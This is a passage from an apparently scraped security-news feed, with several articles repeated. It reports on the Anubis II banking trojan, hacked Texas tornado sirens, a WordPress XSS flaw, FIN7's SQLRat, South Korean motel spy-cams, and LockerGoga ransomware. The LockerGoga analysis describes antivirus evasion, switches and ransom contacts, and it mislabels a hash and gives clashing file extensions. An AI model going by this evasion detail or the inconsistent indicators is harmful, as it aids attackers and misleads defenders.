It is in the interest of the actors to infect as many devices as possible as it increases the chances to commit fraud successfully. The problem for Play Store users is that even without being social-engineered, due to the increasing number of Google Play malware campaigns, the risk of downloading a dropper mimicking a benign application has increased significantly. Therefore the statement “only download apps from the official app store” is not enough to remain safe from malware.

Recent updates

The rental of Anubis II was open from Q4 2017 until February 2019. During Q1 2019, actor maza-in vanished from the threat landscape, leaving existing customers without support and updates. Although exact details about the vanishing of the actor remain unclear at the time of writing, a chain of events confirms that some abnormal activity took place around Anubis and its author.On December 13 2018 maza-in announces the release of Anubis 2.5; seemingly only redesigning the backend web interface, while actually stating that he rewrote the whole bot code.On January 16 2019 Anubis code is leaked in an underground forum (both backend code and unobfuscated APK).On February 14 2019 for the first time an Anubis sample seen targeting Russian banks only is spotted (indicating a new campaign / new operator).On February 25 2019 some complaints from Anubis customers appear in underground forums stating that maza-in and Anubis support no longer reply to messages.On March 04 2019, the admin of one underground forum states maza-in got arrested. Shortly after this, accounts of maza-in are banned on multiple forums.During March 2019, actor Aldesa (who shares a connection with maza-in) creates a post to sell the so-called “Anubis 3” malware on an underground forum. His post gets removed by the admin quite quickly.

We can conclude that the Anubis Trojan is no longer officially rented. However, ThreatFabric experts have observed certain Anubis customers having access to the builder and admin panel, which explains why the operations have not been totally disrupted.

Although it is hard to say why maza-in really vanished, the fact that some code has been leaked combined with recent observations of unobfuscated Anubis samples in the wild, may suggest that the malware will be used by other actors and thus remain active.

What we learned from history

In the past, several other banking Trojans have seen their operations being disrupted and/or source code leaked. It often results in a decrease in the operations and number of samples generated, but most often activity resumes after some quiet time.

There might be some explanations to this such as actors/operators being scared of sudden changes, possibly indicating take-downs or arrests; the time needed to get hands on the right resources and accounts to resume operations; delay between the moment operations stop and leaking of source code; etc… In some cases, the calm after the storm resulted in some new variants appearing on the threat landscape, indicating the delay was probably due to the need for other actors to build their own malware version/variant based on the leaked code.

Marcher

In 2016, the operations of another popular Android banking malware named Marcher were disrupted in a similar way to what happened to Anubis. The actor behind the Marcher Trojan got banned and the renting service was discontinued. The renting model of that Trojan allowed purchase of the APK (bot) builder, therefore a number of Marcher actors obtained the source code of the admin panel and the bot itself.

Some of them resold the sources and some of them used them as a base for their own banking malware; therefore, although operations were disrupted the Trojan remained active for a while and new malware families emerged. Examples of modern families based on Marcher are:ExoBotGustuffDiseaseBotBubabotNeobot

Even now it sometimes happens that some new Marcher-based Trojans appear on the threat-landscape.

The story repeats itself

Looking at actual situation for Anubis, several scenarios are possible:Actors having access to relevant resources continue using Anubis in it’s actual stateSome actor or actor group will step in and will become the new maintainer of Anubis, business starts overActors stop using Anubis and wait for some new banking malware to become availableActors having access to relevant resources will start to modify and improve the existing code base to create their own malware

As mentioned before, Anubis itself is based on the Bankbot Trojan, which was made public on purpose. This resulted in the appearance of at least 4 distinctive malware families/variants as shown in the picture hereunder:

BankBot Tree

We can say that Anubis itself also sprung into existence from the publicly available BankBot code. Considering the increasing demand for Android banking malware and the fact that unobfuscated versions of the bot and the code of the admin panel of Anubis are publicly available we can definitely expect similar events.

Anubis statistics

As Anubis is a rented banking Trojan, each buyer/operator can decide the effective list of applications the Trojan should target. This results in many different campaigns with different objectives.

Although there have been several different campaigns targeting different sets of applications, when considering the average Anubis sample, the number of targets is approximately 370 unique applications.

Target locations

Based on the countries for which the targeted applications are made, it is possible to make statistics of the number of targets per region.

As can be seen in following chart, it is clear that there is a strong interest in institutions providing services in Europe, Asia and the Americas:

Targets per region

When we narrow this down to subregions we can see that the targets are in fact institutions active in Europe, West-Asia, North-America and Australia.

Interestingly, those locations match banking malware’s “usual suspects”; many of the previously observed banking malware families have been seen primarily targeting financial institutions in those subregions.

Targets per subregion

Anubis has been targeting applications from financial institutions present in more than 100 different countries. The top 20 victim countries are visible in following chart:

Targets per country

Keep in mind that statistics can be slightly biased due to certain applications serving a large number of different countries.

Target types

Based on the application types provided by Google, we can see based on the targeted applications that although the Anubis Trojan is a banker and therefore mainly targets “Finance” apps, it also has interest in other types of apps.

As visible in following chart, the application types in second and third position of interest are “Shopping” and “Business” apps, which can be explained by the fact that is shouldn’t look suspicious to the victim when such applications are requesting update of payment details or other sensitive information.

After “Finance” apps, the app types of second choice are “Shopping” and “Business” followed by “Tools”, “Communication” and “Social” apps. Therefore, understand that although such malware is called banking malware its aim is to perform fraud and therefore targets more than only financial apps to achieve its goal.

Target types

In conclusion, what’s next

Considering the growing demand for Android banking malware, we can definitely expect actors to continue using Anubis. Although the creator has vanished the threat is still real; the malware will continue to operate and provide its advanced features to ill-intentioned actors.

We can expect the following events to take place:Anubis customers having sufficient resources will continue to use the Trojan.As some actors have access to both the Anubis admin panel and builder it’s likely they will try to sell it by themselves.Some disgruntled customers having access to the sources might leak additional code and resources as retaliation.As it’s known that some actors have access to the right resources we can expect some enhancement and maybe even new features.

If those events indeed take place, it will result in new actors using Anubis, new campaigns and maybe even new malware variants or malware families based on the Anubis code.

Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud; Anubis is only one of the many Trojans active in the wild!

Further info including Anubis II samples are reported in the original analysis published by the ThreatFabric.

https://www.threatfabric.com/blogs/anubis_2_malware_and_afterlife.html

Pierluigi Paganini

(SecurityAffairs – malware, Anubis II)

The post Anubis II – malware and afterlife appeared first on Security Affairs.

Security Affairs: Hackers raised fake tornado alarms in two Texas towns

Hackers took control of the emergency tornado alarms in Texas causing the panic, it has happened on March 12th, at around 2:30 a.m.,

On March 12th, at around 2:30 a.m. in two towns in Texas (the DeSoto and Lancaster areas) hackers took control of the emergency tornado alarms causing the panic among residents.

The alarms repeatedly went on and off until 4:00 a.m., when authorities regained their control.

The areas interested by the incident were hit by tornadoes several times in the past, for this reason, the authorities build an emergency tornado alarm system.

Every time people hear the emergency tornado alarms need to follow specific procedures to protect themselves against the natural disaster.

The hackers raised at least 30 alarms, twenty of them were raised in Lancaster and the rest in DeSoto.

The systems remained offline until Monday 17th March, fortunately, there were no imminent risks of tornados in that period.

The police are investigating the intrusion in the alarm systems of the two towns, the authorities will be intransigent with those who have breached into a critical system on which human lives may depend,

Pierluigi Paganini

(SecurityAffairs – emergency tornado alarms, hacking)


The post Hackers raised fake tornado alarms in two Texas towns appeared first on Security Affairs.



Security Affairs

Hackers raised fake tornado alarms in two Texas towns

Hackers took control of the emergency tornado alarms in Texas causing the panic, it has happened on March 12th, at around 2:30 a.m.,

On March 12th, at around 2:30 a.m. in two towns in Texas (the DeSoto and Lancaster areas) hackers took control of the emergency tornado alarms causing the panic among residents.

The alarms repeatedly went on and off until 4:00 a.m., when authorities regained their control.

The areas interested by the incident were hit by tornadoes several times in the past, for this reason, the authorities build an emergency tornado alarm system.

Every time people hear the emergency tornado alarms need to follow specific procedures to protect themselves against the natural disaster.

The hackers raised at least 30 alarms, twenty of them were raised in Lancaster and the rest in DeSoto.

The systems remained offline until Monday 17th March, fortunately, there were no imminent risks of tornados in that period.

The police are investigating the intrusion in the alarm systems of the two towns, the authorities will be intransigent with those who have breached into a critical system on which human lives may depend,

Pierluigi Paganini

(SecurityAffairs – emergency tornado alarms, hacking)


The post Hackers raised fake tornado alarms in two Texas towns appeared first on Security Affairs.

E Hacking News – Latest Hacker News and IT Security News: Zero-day Stored XSS Vulnerability Allowed Attackers to Compromise 70,000 Websites



Researchers found out that "Social Warfare", a social sharing plug-in powered by Warfare Plugins is infected with a critical Stored XSS Zero-day flaw which allows cybercriminals to place malicious scripts and conquer the assailable WordPress websites.

'Social Warfare' is a social sharing plugin which is essentially used to accumulate more website traffic by receiving more social shares for website developers.

Amidst some of the plugins debugging features, the plug-in carries an exploitable code which assists the payload in being stored in the website's database and reclaimed with every page request.

Referencing from Sucuri research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability."

The exploit which was rampantly distributed across the globe is a critical flaw that has allowed hackers to entirely gain control of the ill-protected websites in the sphere.

As the abuse of the exploit continued, multiple ongoing attempts from over a hundred distinct IPs were noticed by the analysts.

Reportedly, around 70,000 websites have the plugin installed and the attacks are likely to multiply if the flaw is left unpatched. Meanwhile, users are advised by the experts to get an update to version 3.5.3.



E Hacking News - Latest Hacker News and IT Security News

Zero-day Stored XSS Vulnerability Allowed Attackers to Compromise 70,000 Websites



Researchers found out that "Social Warfare", a social sharing plug-in powered by Warfare Plugins is infected with a critical Stored XSS Zero-day flaw which allows cybercriminals to place malicious scripts and conquer the assailable WordPress websites.

'Social Warfare' is a social sharing plugin which is essentially used to accumulate more website traffic by receiving more social shares for website developers.

Amidst some of the plugins debugging features, the plug-in carries an exploitable code which assists the payload in being stored in the website's database and reclaimed with every page request.

Referencing from Sucuri research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability."

The exploit which was rampantly distributed across the globe is a critical flaw that has allowed hackers to entirely gain control of the ill-protected websites in the sphere.

As the abuse of the exploit continued, multiple ongoing attempts from over a hundred distinct IPs were noticed by the analysts.

Reportedly, around 70,000 websites have the plugin installed and the attacks are likely to multiply if the flaw is left unpatched. Meanwhile, users are advised by the experts to get an update to version 3.5.3.

PewDiePie ransomware forcing users to subscribe him on YouTube

By Waqas

T-Series – PewDiePie Battle Takes an Ugly Turn- PewDiePie Fans Launching PewDiePie ransomware to Get Followers. The battle between T-Series and PewDiePie for the top slot on YouTube is getting more fierce and dramatic day by day. Where T-Series fans are supporting the Indian music company, PewDiePie fans have resorted to extreme measures in making […]

This is a post from HackRead.com Read the original post: PewDiePie ransomware forcing users to subscribe him on YouTube

FIN7 is back with a previously unseen SQLRat malware

The financially-motivated hacking group FIN7 is back and used a new piece of malware in a recent hacking campaign.

Security experts at Flashpoint revealed that the financially-motivated cybercrime group FIN7 (aka Anunak and Carbanak) used new malware in a recent hacking campaign.

The group that has been active since late 2015 targeted businesses worldwide to steal payment card information. Fin7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

On August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

Despite law enforcement activity against the group, Flashpoint experts have discovered a new administrative panel associated previously undetected malware samples. The new malicious code was used in a hacking campaign tracked as Astra that was carried out from May to July 2018, but experts did not exclude the attack may have started on January 2018.

“Flashpoint analysts recently uncovered a new attack panel used by this group in campaigns they have called Astra. The panel, written in PHP, functions as a script-management system, pushing attack scripts down to compromised computers.” reads the analysis published by Flashpoint.

“Analysts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code, connecting the group to these campaigns.”

The administrative panel discovered by the researchers is written in PHP and is used by attackers to send attack scripts to compromised computers.

Experts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code.

According to the US DoJ, the security services company Combi Security was based in Russia and Israel and was used by FIN7 to recruit other hackers.

The attack chain starts with spear-phishing messages containing malicious attachments, the messages are specially crafted to trick victims into opening the message and execute the attached document.

The messages would deliver a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The emails would also drop the backdoor DNSbot that primarily operates over DNS traffic.

“One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don’t leave artifacts behind the way traditional malware does.” continues the analysis. “Once they are deleted by the attackers’ code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7.”

The SQLRat directly connects a Microsoft database under the control of the attackers and execute the contents of various tables.

fin7

The script retrieves a version of TinyMet (an open source Meterpreter stager), the attackers can also deliver other binaries loaded into the tables.

“The Astra backend was installed on a Windows server with Microsoft SQL. The panel was written in PHP and managed the content in the tables. It functioned as a script management system,” Flashpoint said. 

Pierluigi Paganini

(SecurityAffairs – FIN7, Astra)

The post FIN7 is back with a previously unseen SQLRat malware appeared first on Security Affairs.

Security Affairs: FIN7 is back with a previously unseen SQLRat malware

The financially-motivated hacking group FIN7 is back and used a new piece of malware in a recent hacking campaign.

Security experts at Flashpoint revealed that the financially-motivated cybercrime group FIN7 (aka Anunak and Carbanak) used new malware in a recent hacking campaign.

The group that has been active since late 2015 targeted businesses worldwide to steal payment card information. Fin7 is suspected to have hit more than 100 US companies, most of them in the restaurant, hospitality, and industries.

On August 2018, three members of the notorious cybercrime gang have been indicted and charged with 26 felony counts of conspiracy, wire fraud, computer hacking, access device fraud and aggravated identity theft.

Despite law enforcement activity against the group, Flashpoint experts have discovered a new administrative panel associated previously undetected malware samples. The new malicious code was used in a hacking campaign tracked as Astra that was carried out from May to July 2018, but experts did not exclude the attack may have started on January 2018.

“Flashpoint analysts recently uncovered a new attack panel used by this group in campaigns they have called Astra. The panel, written in PHP, functions as a script-management system, pushing attack scripts down to compromised computers.” reads the analysis published by Flashpoint.

“Analysts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code, connecting the group to these campaigns.”

The administrative panel discovered by the researchers is written in PHP and is used by attackers to send attack scripts to compromised computers.

Experts discovered references to the FIN7 front company Combi Security in the Astra panel’s backend PHP code.

According to the US DoJ, the security services company Combi Security was based in Russia and Israel and was used by FIN7 to recruit other hackers.

The attack chain starts with spear-phishing messages containing malicious attachments, the messages are specially crafted to trick victims into opening the message and execute the attached document.

The messages would deliver a previously unseen malware tracked as SQLRat that drops files and executes SQL scripts on the host. The emails would also drop the backdoor DNSbot that primarily operates over DNS traffic.

“One of the documents spreads what analysts are calling SQLRat, previously unseen malware that drops files and executes SQL scripts on the host system. The use of SQL scripts is ingenious in that they don’t leave artifacts behind the way traditional malware does.” continues the analysis. “Once they are deleted by the attackers’ code, there is nothing left to be forensically recovered. This technique has not been observed in previous campaigns associated with FIN7.”

The SQLRat directly connects a Microsoft database under the control of the attackers and execute the contents of various tables.

fin7

The script retrieves a version of TinyMet (an open source Meterpreter stager), the attackers can also deliver other binaries loaded into the tables.

“The Astra backend was installed on a Windows server with Microsoft SQL. The panel was written in PHP and managed the content in the tables. It functioned as a script management system,” Flashpoint said. 

Pierluigi Paganini

(SecurityAffairs – FIN7, Astra)

The post FIN7 is back with a previously unseen SQLRat malware appeared first on Security Affairs.



Security Affairs

South Korea – 1,600 guests at 30 motels secretly live streamed

Four people from South Korea are accused of secretly live streaming, and selling videos made with spy-cam installed in 42 motel rooms at 30 motels in 10 cities in South Korea.

According to the media, 1600 motel guests between November 24 and March 2 were spied by the indicted individuals that now face up to five years in prison, as well as a ₩30 million fine along with a ₩10 million penalty for porn distribution.

The group wireless micro IP cameras hidden in motel rooms at 30 motels in 10 cities in the North and South Gyeongsang and Chungcheong Provinces.

The cameras with 1-millimeter lenses were planted in TV media boxes and power sockets.

Hidden camera
Image source: Yonhap News Agency

The group transmitted the videos via a streaming website that was using servers abroad. According to the investigators the site had 4099 registered users, the gang sold 803 videos and earned $6,200.

“The site had more than 4,000 members, 97 of whom paid a $44.95 monthly fee to access extra features, such as the ability to replay certain live streams. Between November 2018 and this month, police said, the service brought in upward of $6,000.” reported the CNN.

The South Korean authorities confirmed that other similar cases have happened in the past.

“There was a similar case in the past where illegal cameras were (secretly installed) and were consistently and secretly watched, but this is the first time the police caught where videos were broadcast live on the internet,” police said.

South Korea authorities confirmed that spy-cam sites and revenge porn are common crimes in the country, as reported in a press release published by the Copyright Protection Division of South Korea’s Ministry of Culture, Sports and Tourism.

“The police agency strictly deals with criminals who post and share illegal videos as they severely harm human dignity,” reads a statement issued by the Seoul Metropolitan Police Agency.

It is quite easy to buy spy cam detectors in South Korea, The KoreaTimes revealed that the sales of these devices have a spike in March 2019 after media reported the case of a South Korean singer who secretly recorded videos of his partners and shared them with friends.

In September 2018, the South Korean government carried out a campaign that led to the inspection of thousands of public toilets for hidden cams

The fight against this kind of crime included doubled prison sentences for people involved in such kind of illegal activities.

Pierluigi Paganini

(SecurityAffairs – South Korea, revenge porn)

The post South Korea – 1,600 guests at 30 motels secretly live streamed appeared first on Security Affairs.

Security Affairs: South Korea – 1,600 guests at 30 motels secretly live streamed

Four people from South Korea are accused of secretly live streaming, and selling videos made with spy-cam installed in 42 motel rooms at 30 motels in 10 cities in South Korea.

According to the media, 1600 motel guests between November 24 and March 2 were spied by the indicted individuals that now face up to five years in prison, as well as a ₩30 million fine along with a ₩10 million penalty for porn distribution.

The group wireless micro IP cameras hidden in motel rooms at 30 motels in 10 cities in the North and South Gyeongsang and Chungcheong Provinces.

The cameras with 1-millimeter lenses were planted in TV media boxes and power sockets.

Hidden camera
Image source: Yonhap News Agency

The group transmitted the videos via a streaming website that was using servers abroad. According to the investigators the site had 4099 registered users, the gang sold 803 videos and earned $6,200.

“The site had more than 4,000 members, 97 of whom paid a $44.95 monthly fee to access extra features, such as the ability to replay certain live streams. Between November 2018 and this month, police said, the service brought in upward of $6,000.” reported the CNN.

The South Korean authorities confirmed that other similar cases have happened in the past.

“There was a similar case in the past where illegal cameras were (secretly installed) and were consistently and secretly watched, but this is the first time the police caught where videos were broadcast live on the internet,” police said.

South Korea authorities confirmed that spy-cam sites and revenge porn are common crimes in the country, as reported in a press release published by the Copyright Protection Division of South Korea’s Ministry of Culture, Sports and Tourism.

“The police agency strictly deals with criminals who post and share illegal videos as they severely harm human dignity,” reads a statement issued by the Seoul Metropolitan Police Agency.

It is quite easy to buy spy cam detectors in South Korea, The KoreaTimes revealed that the sales of these devices have a spike in March 2019 after media reported the case of a South Korean singer who secretly recorded videos of his partners and shared them with friends.

In September 2018, the South Korean government carried out a campaign that led to the inspection of thousands of public toilets for hidden cams

The fight against this kind of crime included doubled prison sentences for people involved in such kind of illegal activities.

Pierluigi Paganini

(SecurityAffairs – South Korea, revenge porn)

The post South Korea – 1,600 guests at 30 motels secretly live streamed appeared first on Security Affairs.



Security Affairs

[SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies

LockerGoga is the most active ransomware, experts warns it focuses on targeting companies and bypass AV signature-based detection.

LockerGoga ransomware is a crypto-malware that loads the malicious file on the system from an infected email attachment.

This threat is very critical these days, and it is the most active ransomware that focuses on targeting companiesAltran and Norsk Hydro are two companies severely affected this wave and the damage is giant.

Altran said on Monday it had shut down its IT network and applications and a recovery plan was under way.

On the other hand, the aluminum giant, Norway’s Norsk Hydro, said on Tuesday 19th, it was hit by a ransomware called LockerGoga.

“Hydro became victim of an extensive cyberattack in the early hours of Tuesday, impacting operations in several of the company’s business areas,” reads a statement issued by the company.

The first public mention related to Altran cyber attack was seen in a tweet on January 25th, which received a reply from a computer security researcher who hinted that a malware sample that was uploaded to VirusTotal was behind the attack.ù

The aluminum giant was also heavily impacted, with notes left by the security department for collaborators to keep their computers and mobile devices disconnected from Hydro network.

1

This ransomware’s name is based on the path used for compiling the source code into an executable that was discovered by MalwareHunterTeam.

  1. X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\rijndael_simd.cpp

According to Recorded Future graphic, and illustrated below, LockerGoga was first observed on January 24th in Romania and later in the Netherlands. The first big hit was noted in Altran attack, and now, the Norway’s Norsk Hydro also view its infrastructure severely compromised by this ransomware.

2

During the SI-LAB analysis, this ransomware bypass AV signature-based detection —  a sample  with a score of 0/69 was submitted to VirusTotal on March 8th, 2019 and nothing was detected.

3

In addition, the ransomware has also not been detected by Microsoft Windows Defender. This means that any company within the attacker’s scope could be compromised by crooks.

Note that ransomware is probably detected during antivirus behavioral analysis — heuristic and signature-based detection are easily passed.

The threat is signed with a valid digital certificate. It’s issued by Comodo Certificate Authority (acquired by Francisco Partners and known by its new brand name Sectigo) for code signing.

4

SI-LAB observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

If the ransomware is launched with the ‘-w’ command line argument, it will target all file types. Other switches supported are ‘-k’ and ‘-m’ for base 64 encoding and for providing the emails addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawned a new process for each file it encrypted. In fact, this caused the encryption process to be very slow.

All the encrypted files are renamed and the extension “.locker” is appended.

After encryption, it will drop a ransom note named README-NOW.txt on the victim’s desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.

6

Users who receive this kind of threats need to pay attention and report the situation as fast as possible. As seen, this ransomware can easily bypass AV protections and a bad choice can compromise an entire infrastructure impacting the lives of hundreds of people.

More details about LockerGoga below in Technical Analysis.

Technical Analysis – LockerGoga


File name: yxugwjud6698.exe
Threat: LockerGoga ransomware
Ransom note: README-NOW.txt
File Extension: .locked
Encryption Algorithm: RSA-4096 and AES-256
MD5: eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0


LockerGoga ransomware is a ransomware that was initially discovered after attacks were launched against European companies, such as Altran Technologies in France and and also Norsk Hydro.

SI-LAB observed this ransomware and noted that a sample submitted onto VirusTotal at 19-03-08 12:43:50 UTC was not classified as malicious.

Figure 1: LockerGoga ransomware  not detected by VirusTotal.

This threat was also noted by MalwareHunterTeam. In a tweet is mentioned the following:

As shown, after a few hours, some detentions were already marked in VirusTotal, which indicates this ransomware was probably detected through a behavioral analysis by AV engines.

Figure 2: LockerGoga detections by VirusTotal.

At a first glance this ransomware seems to be a FUD malware. Let’s look.

Windows Defender does not detect LockerGoga

We run the malware on a virtual machine with Windows 10 installed and no malicious activity was detected by Microsoft antivirus on March, 12th. More, we perform a single scan with Windows Defender directly and no suspicious activity has been flagged as well.

Figure 3: LockerGoga does not detected by Windows Defender.

As shown in Figure 4, no suspicious sections were noted but some details need to be mentioned, namely:

  1. The ransomware is signed;
  2. It is packed;
  3. LockerGoga has associated mutex activities;
  4. It has anti-debut and antiVM protections.

Figure 4: First LockerGoga fingerprint.

In detail, we can see that known functions used in antivm and antidebug processes are called during its execution, such as GetLastError();IsDebuggerPresent and OutputDebugStringA().

Another important aspect is that the ransomware was built in Microsoft Visual C++ 8 — a programming language widely used by threat actors and perfect for handling system calls at the lowest level.

The malware requires admin rights to run. Then, it need to use requireAdministrator. When a standard user starts such a process, the over-the-shoulder UAC dialog is shown. That gives the user an opportunity to ask an admin to supply their credentials.

Figure 5: Admin right required when malware is executed.

Looking at IDA, we can detected that LockerGoga uses AES-256 and RSA to encrypt all the targeted files from the victims’ devices.

Figure 6: Cryptographic functions used by LockerGoga.

SI-LAB also observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

This ransomware is signed by Sectigo, Comodo Certificate Authority (acquired by Francisco Partners and known by its new brand name Sectigo) for code signing.

14

Figure 7: This ransomware is signed by Sectigo, Comodo Certificate Authority.

Behavior Analysis

When executed, the ransomware starts with the ‘-w’ command line argument, it will target all file types. Other switches supported are ‘-k’ and ‘-m’ for base 64 encoding and for providing the emails addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawned a new process for each file it encrypted. In fact, this caused the encryption process to be very slow.

Figure 8: Malware launches several copies itself to encrypt targeted files.

The ransomware will append the .locked extension to encrypted file’s names. This means that a file named readme.txt would be encrypted and then renamed to readme.txt.locked.

5

Figure 8: Files encrypted by LockerGoga — .locked extension is appended.

After encryption, it will drop a ransom note named README-NOW.txt on the desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.

6

Figure 9: Ransom note drooped by malware in user’s desktop.

After a memory analysis, no RSA or AES keys were noted in order to decrypt the targeted files. Nonetheless, good news for victims, the ransomware don’t affects Windows shadow copies.

Final Notes

In the recent past, several variants this ransomware have been noted. That way, it’s important for users and businesses to have their antivirus fully updated with recent malware signatures.

SI-LAB also has available a YARA rule which allows a more effective scan to detect threats this nature.

Further technical details, including Indicators of Compromise (IoCs) and Yara rules are reported in the analysis published by Pedro Tavares:

About the author Pedro Tavares:

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog segurancainformatica.pt.

Pierluigi Paganini

(SecurityAffairs – LockerGoga, ransomware)

The post [SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies appeared first on Security Affairs.

Security Affairs: [SI-LAB] LockerGoga is the most active ransomware that focuses on targeting companies

LockerGoga is the most active ransomware, experts warns it focuses on targeting companies and bypass AV signature-based detection.

LockerGoga ransomware is a crypto-malware that loads the malicious file on the system from an infected email attachment.

This threat is very critical these days, and it is the most active ransomware that focuses on targeting companiesAltran and Norsk Hydro are two companies severely affected this wave and the damage is giant.

Altran said on Monday it had shut down its IT network and applications and a recovery plan was under way.

On the other hand, the aluminum giant, Norway’s Norsk Hydro, said on Tuesday 19th, it was hit by a ransomware called LockerGoga.

“Hydro became victim of an extensive cyberattack in the early hours of Tuesday, impacting operations in several of the company’s business areas,” reads a statement issued by the company.

The first public mention related to Altran cyber attack was seen in a tweet on January 25th, which received a reply from a computer security researcher who hinted that a malware sample that was uploaded to VirusTotal was behind the attack.ù

The aluminum giant was also heavily impacted, with notes left by the security department for collaborators to keep their computers and mobile devices disconnected from Hydro network.

1

This ransomware’s name is based on the path used for compiling the source code into an executable that was discovered by MalwareHunterTeam.

  1. X:\work\Projects\LockerGoga\cl-src-last\cryptopp\src\rijndael_simd.cpp

According to Recorded Future graphic, and illustrated below, LockerGoga was first observed on January 24th in Romania and later in the Netherlands. The first big hit was noted in Altran attack, and now, the Norway’s Norsk Hydro also view its infrastructure severely compromised by this ransomware.

2

During the SI-LAB analysis, this ransomware bypass AV signature-based detection —  a sample  with a score of 0/69 was submitted to VirusTotal on March 8th, 2019 and nothing was detected.

3

In addition, the ransomware has also not been detected by Microsoft Windows Defender. This means that any company within the attacker’s scope could be compromised by crooks.

Note that ransomware is probably detected during antivirus behavioral analysis — heuristic and signature-based detection are easily passed.

The threat is signed with a valid digital certificate. It’s issued by Comodo Certificate Authority (acquired by Francisco Partners and known by its new brand name Sectigo) for code signing.

4

SI-LAB observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

If the ransomware is launched with the ‘-w’ command line argument, it will target all file types. Other switches supported are ‘-k’ and ‘-m’ for base 64 encoding and for providing the emails addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawned a new process for each file it encrypted. In fact, this caused the encryption process to be very slow.

All the encrypted files are renamed and the extension “.locker” is appended.

After encryption, it will drop a ransom note named README-NOW.txt on the victim’s desktop, which includes instructions to contact the SuzuMcpherson@protonmail.com or AsuxidOruraep1999@o2.pl email addresses for payment instructions.

6

Users who receive this kind of threats need to pay attention and report the situation as fast as possible. As seen, this ransomware can easily bypass AV protections and a bad choice can compromise an entire infrastructure impacting the lives of hundreds of people.

More details about LockerGoga below in Technical Analysis.

Technical Analysis – LockerGoga


File name: yxugwjud6698.exe
Threat: LockerGoga ransomware
Ransom note: README-NOW.txt
File Extension: .locked
Encryption Algorithm: RSA-4096 and AES-256
MD5: eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0


LockerGoga ransomware is a ransomware that was initially discovered after attacks were launched against European companies, such as Altran Technologies in France and and also Norsk Hydro.

SI-LAB observed this ransomware and noted that a sample submitted onto VirusTotal at 19-03-08 12:43:50 UTC was not classified as malicious.

Figure 1: LockerGoga ransomware  not detected by VirusTotal.

This threat was also noted by MalwareHunterTeam. In a tweet is mentioned the following:

As shown, after a few hours, some detentions were already marked in VirusTotal, which indicates this ransomware was probably detected through a behavioral analysis by AV engines.

Figure 2: LockerGoga detections by VirusTotal.

At a first glance this ransomware seems to be a FUD malware. Let’s look.

Windows Defender does not detect LockerGoga

We run the malware on a virtual machine with Windows 10 installed and no malicious activity was detected by Microsoft antivirus on March, 12th. More, we perform a single scan with Windows Defender directly and no suspicious activity has been flagged as well.

Figure 3: LockerGoga does not detected by Windows Defender.

As shown in Figure 4, no suspicious sections were noted but some details need to be mentioned, namely:

  1. The ransomware is signed;
  2. It is packed;
  3. LockerGoga has associated mutex activities;
  4. It has anti-debut and antiVM protections.

Figure 4: First LockerGoga fingerprint.

In detail, we can see that known functions used in antivm and antidebug processes are called during its execution, such as GetLastError();IsDebuggerPresent and OutputDebugStringA().

Another important aspect is that the ransomware was built in Microsoft Visual C++ 8 — a programming language widely used by threat actors and perfect for handling system calls at the lowest level.

The malware requires admin rights to run. Then, it need to use requireAdministrator. When a standard user starts such a process, the over-the-shoulder UAC dialog is shown. That gives the user an opportunity to ask an admin to supply their credentials.

Figure 5: Admin right required when malware is executed.

Looking at IDA, we can detected that LockerGoga uses AES-256 and RSA to encrypt all the targeted files from the victims’ devices.

Figure 6: Cryptographic functions used by LockerGoga.

SI-LAB also observed the ransomware will normally target DOC, DOT, WBK, DOCX, DOTX, DOCB, XLM, XLSX, XLTX, XLSB, XLW, PPT, POT, PPS, PPTX, POTX, PPSX, SLDX, and PDF files.

This ransomware is signed by Sectigo, Comodo Certificate Authority (acquired by Francisco Partners and known by its new brand name Sectigo) for code signing.

14

Figure 7: This ransomware is signed by Sectigo, Comodo Certificate Authority.

Behavior Analysis

When executed, the ransomware starts with the ‘-w’ command line argument, it will target all file types. Other switches supported are ‘-k’ and ‘-m’ for base 64 encoding and for providing the emails addresses to show in the ransom note.

Another interesting thing is that the ransomware sample launches itself with the -w argument and also spawned a new process for each file it encrypted. In fact, this caused the encryption process to be very slow.

Figure 8: Malware launches several copies itself to encrypt targeted files.

The ransomware will append the .locked extension to encrypted file’s names. This means that a file named readme.txt would be encrypted and then renamed to readme.txt.locked.

5

Figure 8: Files encrypted by LockerGoga — .locked extension is appended.

